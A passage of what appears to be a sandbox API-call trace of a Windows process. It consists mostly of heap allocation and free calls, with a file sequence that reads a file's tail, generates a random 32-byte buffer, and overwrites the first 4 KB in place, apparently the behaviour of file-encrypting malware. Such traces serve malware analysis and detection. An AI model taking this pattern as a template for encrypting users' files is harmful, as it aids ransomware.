dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.283] GetProcessHeap () returned 0x4f10000 [0085.283] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.283] GetProcessHeap () returned 0x4f10000 [0085.283] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.283] GetProcessHeap () returned 0x4f10000 [0085.283] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.283] GetProcessHeap () returned 0x4f10000 [0085.283] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.284] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.284] GetProcessHeap () returned 0x4f10000 [0085.285] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.285] GetProcessHeap () returned 0x4f10000 [0085.285] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.286] GetProcessHeap () returned 0x4f10000 [0085.286] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.286] GetProcessHeap () returned 0x4f10000 [0085.286] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.286] GetProcessHeap () returned 0x4f10000 [0085.286] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.286] GetProcessHeap () returned 0x4f10000 [0085.286] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.286] GetProcessHeap () returned 0x4f10000 [0085.286] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.286] GetProcessHeap () returned 0x4f10000 [0085.286] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.286] GetProcessHeap () returned 0x4f10000 [0085.286] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.286] GetProcessHeap () returned 0x4f10000 [0085.286] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.286] GetProcessHeap () returned 0x4f10000 [0085.286] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.286] GetProcessHeap () returned 0x4f10000 [0085.286] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.286] GetProcessHeap () returned 0x4f10000 [0085.286] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.286] GetProcessHeap () returned 0x4f10000 [0085.286] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.286] GetProcessHeap () returned 0x4f10000 [0085.287] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.287] GetProcessHeap () returned 0x4f10000 [0085.287] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.287] GetProcessHeap () returned 0x4f10000 [0085.287] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.287] GetProcessHeap () returned 0x4f10000 [0085.287] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.287] GetProcessHeap () returned 0x4f10000 [0085.287] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.287] GetProcessHeap () returned 0x4f10000 [0085.287] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.287] GetProcessHeap () returned 0x4f10000 [0085.287] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.287] GetProcessHeap () returned 0x4f10000 [0085.287] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.287] GetProcessHeap () returned 0x4f10000 [0085.287] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.287] GetProcessHeap () returned 0x4f10000 [0085.287] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.287] GetProcessHeap () returned 0x4f10000 [0085.287] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.287] GetProcessHeap () returned 0x4f10000 [0085.287] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.287] GetProcessHeap () returned 0x4f10000 [0085.287] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.287] GetProcessHeap () returned 0x4f10000 [0085.287] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.288] GetProcessHeap () returned 0x4f10000 [0085.288] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.288] GetProcessHeap () returned 0x4f10000 [0085.288] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.288] GetProcessHeap () returned 0x4f10000 [0085.288] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.288] SetFilePointerEx (in: hFile=0x9b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.288] WriteFile (in: hFile=0x9b8, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.288] WriteFile (in: hFile=0x9b8, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.288] GetProcessHeap () returned 0x4f10000 [0085.288] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.288] GetProcessHeap () returned 0x4f10000 [0085.288] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.288] GetProcessHeap () returned 0x4f10000 [0085.288] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.288] CloseHandle (hObject=0x9b8) returned 1 [0085.290] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 144 [0085.290] SetFilePointerEx (in: hFile=0x9bc, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.290] ReadFile (in: hFile=0x9bc, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.290] SetFilePointerEx (in: hFile=0x9bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.290] GetProcessHeap () returned 0x4f10000 [0085.290] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.290] GetProcessHeap () returned 0x4f10000 [0085.290] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.290] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.290] GetProcessHeap () returned 0x4f10000 [0085.290] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.290] ReadFile (in: hFile=0x9bc, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.339] SetFilePointerEx (in: hFile=0x9bc, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.339] WriteFile (in: hFile=0x9bc, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.339] GetProcessHeap () returned 0x4f10000 [0085.339] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.339] GetProcessHeap () returned 0x4f10000 [0085.339] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.339] GetProcessHeap () returned 0x4f10000 [0085.339] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.339] GetProcessHeap () returned 0x4f10000 [0085.339] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.339] GetProcessHeap () returned 0x4f10000 [0085.339] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.339] GetProcessHeap () returned 0x4f10000 [0085.339] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.339] GetProcessHeap () returned 0x4f10000 [0085.339] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.339] GetProcessHeap () returned 0x4f10000 [0085.339] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.339] GetProcessHeap () returned 0x4f10000 [0085.339] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.339] GetProcessHeap () returned 0x4f10000 [0085.339] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.339] GetProcessHeap () returned 0x4f10000 [0085.339] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.339] GetProcessHeap () returned 0x4f10000 [0085.339] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.339] GetProcessHeap () returned 0x4f10000 [0085.340] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.340] GetProcessHeap () returned 0x4f10000 [0085.340] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.341] GetProcessHeap () returned 0x4f10000 [0085.341] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.342] GetProcessHeap () returned 0x4f10000 [0085.342] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.342] GetProcessHeap () returned 0x4f10000 [0085.342] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.342] GetProcessHeap () returned 0x4f10000 [0085.342] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.342] GetProcessHeap () returned 0x4f10000 [0085.342] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.342] GetProcessHeap () returned 0x4f10000 [0085.342] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.342] GetProcessHeap () returned 0x4f10000 [0085.342] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.342] GetProcessHeap () returned 0x4f10000 [0085.342] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.342] GetProcessHeap () returned 0x4f10000 [0085.342] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.342] GetProcessHeap () returned 0x4f10000 [0085.342] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.342] GetProcessHeap () returned 0x4f10000 [0085.342] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.342] GetProcessHeap () returned 0x4f10000 [0085.342] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.342] GetProcessHeap () returned 0x4f10000 [0085.342] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.342] GetProcessHeap () returned 0x4f10000 [0085.342] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.342] GetProcessHeap () returned 0x4f10000 [0085.342] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.343] GetProcessHeap () returned 0x4f10000 [0085.343] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.343] GetProcessHeap () returned 0x4f10000 [0085.343] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.343] GetProcessHeap () returned 0x4f10000 [0085.343] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.343] GetProcessHeap () returned 0x4f10000 [0085.343] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.343] GetProcessHeap () returned 0x4f10000 [0085.343] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.343] GetProcessHeap () returned 0x4f10000 [0085.343] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.343] GetProcessHeap () returned 0x4f10000 [0085.343] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.343] GetProcessHeap () returned 0x4f10000 [0085.343] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.343] GetProcessHeap () returned 0x4f10000 [0085.343] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.343] GetProcessHeap () returned 0x4f10000 [0085.343] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.343] GetProcessHeap () returned 0x4f10000 [0085.343] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.343] GetProcessHeap () returned 0x4f10000 [0085.343] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.343] GetProcessHeap () returned 0x4f10000 [0085.343] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.343] GetProcessHeap () returned 0x4f10000 [0085.343] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.343] SetFilePointerEx (in: hFile=0x9bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.344] WriteFile (in: hFile=0x9bc, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.344] WriteFile (in: hFile=0x9bc, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | 